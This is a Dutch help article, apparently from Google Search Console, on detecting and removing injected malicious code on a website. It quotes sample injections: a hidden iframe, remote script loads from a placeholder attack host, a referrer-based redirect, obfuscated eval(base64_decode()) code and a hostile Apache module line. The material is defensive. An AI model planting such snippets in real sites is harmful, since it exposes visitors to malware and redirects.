Type malware-infectie: Invoeging van code

Wat houdt het in als pagina's zijn gemarkeerd met het type malware-infectie 'Invoeging van code' in Google Search Console?

Dit betekent dat pagina's op uw site zijn aangepast en nu schadelijke code bevatten, zoals een iframe naar een aanvalssite met malware.

Bekijk De schade beoordelen (malware) voor meer algemene informatie over malware.

Hoe onderzoek ik malware van het type 'Invoeging van code'?

Gebruik geen browser om geïnfecteerde pagina's op uw site te bekijken. Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kunt u door het openen van een geïnfecteerde malwarepagina in een browser uw computer beschadigen.

U kunt het gedrag controleren door cURL of Wget te gebruiken om HTTP-verzoeken uit te voeren (bijvoorbeeld om een pagina op te halen). Deze tools zijn gratis beschikbaar en zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzende URL of user-agent. Door schadelijke inhoud alleen te leveren aan gebruikers met bepaalde user-agents of verwijzende URL's, kan de hacker meer 'echte mensen' targeten en beter voorkomen dat hij wordt gedetecteerd door site-eigenaren en malwarescanners. (Uw site moet online zijn om deze tools te gebruiken.)

Bijvoorbeeld:

$curl -v --referer <referer-field> --user-agent "Mozilla/5.0 (
  Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" <your-url>
zoals
$curl -v --referer "http://www.google.com" --user-agent "Mozilla/5.0 
  (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) 
  Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html

Log vervolgens in bij uw bestandssysteem. Onderzoek alle bronnen die schrijven naar de URL's die zijn geïnfecteerd met ingevoegde code. Enkele voorbeelden van schadelijke ingevoegde code:

  • iframe op een aanvalssite
  • <iframe frameborder="0" height="0" src="http://<attack-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript of een andere scripttaal die scripts van een aanvalssite aanroept en uitvoert
  • <script type='text/javascript' src='http://malware-attack-site/js/x55.js'></script>
  • Scripts die de browser omleiden naar een aanvalssite
  • <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://malware-attack-site/");
      }
    </script>
  • Schadelijke code die is verborgen om detectie te voorkomen
  • eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Gedeelde objectbestanden die zijn bedoeld om op willekeurige wijze schadelijke code te schrijven naar scripts die verder goedaardig zijn
  • #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Onderzoek alle mogelijke schadelijke code die aanwezig is op de site. U kunt bijvoorbeeld zoeken op woorden als [iframe] om iframe-code te vinden. Andere nuttige zoekwoorden zijn 'script', 'eval' en 'unescape'. Bijvoorbeeld op systemen met Unix:

$grep -irn "iframe" ./ | less

Hoe kan ik mijn site ontdoen van malware van het type 'Invoeging van code'?

Als u klaar bent om uw site schoon te maken (Stap 7 van het herstelproces 'Hulp bij gehackte sites') kunt u aangetaste bestanden vervangen door de laatste goede back-up of kunt u de ingevoegde code verwijderen van elke pagina en uit alle bijbehorende scriptfuncties en bestanden. Als u configuratiebestanden van uw server heeft gewijzigd, kan het zijn dat u uw webserver opnieuw moet opstarten om de wijzigingen in te laten gaan.

Houd er rekening mee dat het verwijderen van de schadelijke code geen oplossing is voor de onderliggende zwakke plek waardoor de hacker in eerste instantie toegang kreeg tot uw site. Als u de hoofdoorzaak niet aanpakt, kan uw site in de toekomst opnieuw worden gehackt. Bekijk 'Beoordelen van schade aan het bestandssysteem' in Stap 5: De schade beoordelen (malware) van Hulp bij gehackte sites voor meer informatie over het schoonmaken van uw gehele site (niet alleen dit type malware).

Was dit artikel nuttig?
Hoe kunnen we dit verbeteren?